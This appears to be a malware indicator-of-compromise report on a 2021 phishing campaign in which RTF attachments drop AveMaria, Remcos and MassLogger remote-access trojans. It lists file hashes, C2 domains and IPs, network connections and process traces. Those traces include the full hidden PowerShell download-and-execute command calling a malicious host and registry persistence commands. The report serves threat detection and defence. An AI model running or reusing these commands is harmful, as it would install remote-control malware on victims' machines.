#remcosrat_120721

1. #IOC #OptiData #VR #avemaria #remcos #RTF #OLE #powershell
2.  
3. https://pastebin.com/ZYZarB9L
4.  
5. previous_contact:
6. avemaria
7. 20/07/20 https://pastebin.com/LV9NKUiy
8. 17/02/20 https://pastebin.com/DCPutqaR
9.  
10. remcos
11. 15/07/19 https://pastebin.com/ZxG6eRWM
12.  
13. FAQ:
14. https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria
15.  
16. attack_vector
17. --------------
18. email > attach .doc (RTF) > OLE > powershell > GET1 exe > %appdata%\svchost.exe > GET2 exe > %appdata%\FIemEnwKf.exe > exfil 37.0.11.114
19.  
20.  
21. email_headers
22. --------------
23. Received: from gmail.com (unknown [37.0.8.157])
24. From: Manager <mitul1.timurnetwork@gmail.com>
25. To: user00@victim77.org
26. Subject: URGENT: SUPPLY COMPLAIN / DAMAGES
27. Date: 12 Jul 2021 02:47:46 -0700
28. MIME-Version: 1.0
29.  
30.  
31. files
32. --------------
33. [RTF1]
34. *******
35. SHA-256 0366e6f59f94651e2db05a2275584a1fe93f992d937e9666fbec60d78edc6f85
36. File name Picture1.doc [ Rich Text Format ]
37. File size 662.29 KB (678183 bytes)
38.  
39. SHA-256 538b973f12e7eb9390b9b64cb36818b73b139bee73af7d5c7b8c5d72a0dc037a
40. File name svchost.exe [ .NET executable ] - AveMariaRAT
41. File size 465.50 KB (476672 bytes)
42.  
43. SHA-256 ed3a96630761ee25131c40b747f50fc55aa85d5e8f631f71bbfc901dd96bac13
44. File name explorer.exe [ Microsoft Visual C++ ]
45. File size 92.00 KB (94208 bytes) - Remcos RAT
46.  
47.  
48. [RTF2]
49. *******
50. SHA-256 68ebf735d4e141f39519b5906bcd367f49088532e2591f33ed0a1a4a10584d95
51. File name Picture2.doc [ Rich Text Format ]
52. File size 662.30 KB (678199 bytes)
53.  
54. SHA-256 b5e245259b5bad5226aa4f388db61b2709866d6722ffd69f283abd3ca6851823
55. File name powerpoint.exe [ .NET executable ] - masslogger
56. File size 582.50 KB (596480 bytes)
57.  
58. SHA-256 04cde0c2284cc4dc8f8a5aeadafca6819ab9d11dfb76fb7f3a2fbbf91d3c0e5d
59. File name svchost.exe [ .NET executable ]
60. File size 684.00 KB (700416 bytes)
61.  
62. SHA-256 ed3a96630761ee25131c40b747f50fc55aa85d5e8f631f71bbfc901dd96bac13
63. File name AFdCieIpH.exe [ Microsoft Visual C++ ]
64. File size 92.00 KB (94208 bytes) - Remcos RAT
65.  
66.  
67. activity
68. **************
69. PL_SCR httP://kqz.ugo.si/svchost.exe [RTF1]
70. httP://kqz.ugo.si/powerpoint.exe [RTF2]
71.  
72. C2 byx.z86.ru 37.0.11.114
73. hgoz.12v.si 37.0.11.114
74.  
75.  
76. netwrk
77. --------------
78. [RTF1]
79. *******
80. 37.0.11.114 kqz.ugo.si GET /svchost.exe HTTP/1.1 Mozilla/4.0
81. 37.0.11.114 kqz.ugo.si GET /svchost.exe HTTP/1.1
82.  
83.  
84. [RTF2]
85. *******
86. 37.0.11.114 kqz.ugo.si GET /powerpoint.exe HTTP/1.1 Mozilla/4.0
87. 37.0.11.114 kqz.ugo.si GET /powerpoint.exe HTTP/1.1
88. 37.0.11.114 hgoz.12v.si GET /rem.exe HTTP/1.1 Mozilla/4.0
89.  
90. comp
91. --------------
92. [RTF1]
93. *******
94. WINWORD.EXE 3328 TCP 37.0.11.114 80 ESTABLISHED
95. powershell.exe 3828 TCP 37.0.11.114 80 ESTABLISHED
96.  
97. svchost.exe 1404 TCP 37.0.11.114 5200 ESTABLISHED
98. svchost.exe 1404 TCP 37.0.11.114 80 ESTABLISHED
99. explorer.exe 2080 TCP 37.0.11.114 2404 ESTABLISHED
100.  
101.  
102. [RTF2]
103. *******
104. WINWORD.EXE 3836 TCP 37.0.11.114 80 ESTABLISHED
105. explorer.exe 3152 TCP 37.0.11.114 2404 ESTABLISHED
106. svchost.exe 816 TCP 37.0.11.114 5200 ESTABLISHED
107. svchost.exe 816 TCP 37.0.11.114 80 ESTABLISHED
108.  
109. proc
110. --------------
111. [RTF1]
112. *******
113. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
114. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://kqz.ugo.si/svchost.exe','C:\Users\operator\AppData\Roaming\svchost.exe');Start-Process 'C:\Users\operator\AppData\Roaming\svchost.exe'"
115. C:\Users\operator\AppData\Roaming\svchost.exe
116. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
117. C:\tmp\svchost.exe
118. C:\Users\operator\AppData\Roaming\svchost.exe
119. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
120. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
121. C:\Users\operator\AppData\Roaming\svchost.exe
122. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
123. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://kqz.ugo.si/svchost.exe','C:\Users\operator\AppData\Roaming\svchost.exe');Start-Process 'C:\Users\operator\AppData\Roaming\svchost.exe'"
124. C:\Users\operator\AppData\Roaming\svchost.exe
125. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
126.  
127. C:\Users\operator\AppData\Roaming\svchost.exe
128. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
129. C:\tmp\svchost.exe
130. C:\tmp\svchost.exe
131. C:\Windows\SysWOW64\cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\Users\operator\AppData\Roaming\svchost.exe"
132. C:\Windows\SysWOW64\reg.exe ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\Users\operator\AppData\Roaming\svchost.exe"
133. C:\Users\operator\AppData\Roaming\svchost.exe
134. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
135. C:\tmp\svchost.exe
136. C:\Windows\SysWOW64\cmd.exe
137. C:\Users\operator\AppData\Roaming\FIemEnwKf.exe
138. C:\Windows\SysWOW64\cmd.exe cmd /c ""C:\tmp\install.bat" "
139. C:\Windows\SysWOW64\PING.EXE PING 127.0.0.1 -n 2
140. C:\Users\operator\AppData\Roaming\windows\explorer.exe
141.  
142.  
143. [RTF2]
144. *******
145. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
146. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://kqz.ugo.si/powerpoint.exe','C:\Users\operator\AppData\Roaming\powerpoint.exe');Start-Process 'C:\Users\operator\AppData\Roaming\powerpoint.exe'"
147. C:\Users\operator\AppData\Roaming\powerpoint.exe
148. C:\tmp\powerpoint.exe
149. C:\tmp\powerpoint.exe
150. C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\Users\operator\AppData\Roaming\svchost.exe"
151. C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\Users\operator\AppData\Roaming\svchost.exe"
152. C:\Users\operator\AppData\Roaming\svchost.exe
153. C:\tmp\svchost.exe
154. C:\tmp\svchost.exe
155. C:\Windows\SysWOW64\cmd.exe
156. C:\Users\operator\AppData\Roaming\AFdCieIpH.exe
157. C:\Windows\SysWOW64\cmd.exe cmd /c ""C:\tmp\install.bat" "
158. C:\Windows\SysWOW64\PING.EXE PING 127.0.0.1 -n 2
159. C:\Users\operator\AppData\Roaming\windows\explorer.exe
160.  
161. persist
162. --------------
163. [RTF1]
164. *******
165. HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load 13.07.2021 10:39
166. C:\Users\operator\AppData\Roaming\svchost.exe Firefox Mozilla c:\users\operator\appdata\roaming\svchost.exe 13.07.2021 0:03
167.  
168.  
169. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 13.07.2021 10:40
170. pdf c:\users\operator\appdata\roaming\windows\explorer.exe 05.01.2017 22:50
171.  
172.  
173. [RTF2]
174. *******
175. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 13.07.2021 10:37
176. pdf c:\users\operator\appdata\roaming\windows\explorer.exe 05.01.2017 22:50
177.  
178. drop
179. --------------
180. [RTF1]
181. *******
182. %appdata%\svchost.exe
183. %tmp%\svchost.exe
184.  
185. %appdata%\FIemEnwKf.exe
186. %appdata%\windows\explorer.exe
187.  
188. [RTF2]
189. *******
190. %appdata%\powerpoint.exe
191. %tmp%\powerpoint.exe
192. %tmp%\svchost.exe
193. %appdata%\AFdCieIpH.exe
194. %appdata%\windows\explorer.exe
195.  
196.  
197. # # #
198. VT details
199.  
200. RTF1
201. *******
202. https://www.virustotal.com/gui/file/0366e6f59f94651e2db05a2275584a1fe93f992d937e9666fbec60d78edc6f85/details
203. https://www.virustotal.com/gui/file/538b973f12e7eb9390b9b64cb36818b73b139bee73af7d5c7b8c5d72a0dc037a/details
204. https://www.unpac.me/results/b9e19690-4c56-4150-965d-8463b8505682
205. https://analyze.intezer.com/analyses/9ef6d317-1ffe-4698-9a0e-9a96e1b7c0dd
206. https://www.virustotal.com/gui/file/ed3a96630761ee25131c40b747f50fc55aa85d5e8f631f71bbfc901dd96bac13/details
207. https://analyze.intezer.com/analyses/46648e4d-8816-4ba0-bacb-4857ab6d3215
208.  
209. RTF2
210. *******
211. https://www.virustotal.com/gui/file/68ebf735d4e141f39519b5906bcd367f49088532e2591f33ed0a1a4a10584d95/details
212. https://www.virustotal.com/gui/file/b5e245259b5bad5226aa4f388db61b2709866d6722ffd69f283abd3ca6851823/details
213. https://www.unpac.me/results/a2582bf5-9003-4650-bcbc-135f13d6c47c
214. https://analyze.intezer.com/analyses/38ba4b0f-e0d8-4791-8fdb-59d31fca75c2
215. https://www.virustotal.com/gui/file/ed3a96630761ee25131c40b747f50fc55aa85d5e8f631f71bbfc901dd96bac13/details
216. https://analyze.intezer.com/analyses/46648e4d-8816-4ba0-bacb-4857ab6d3215
217.  
218. VR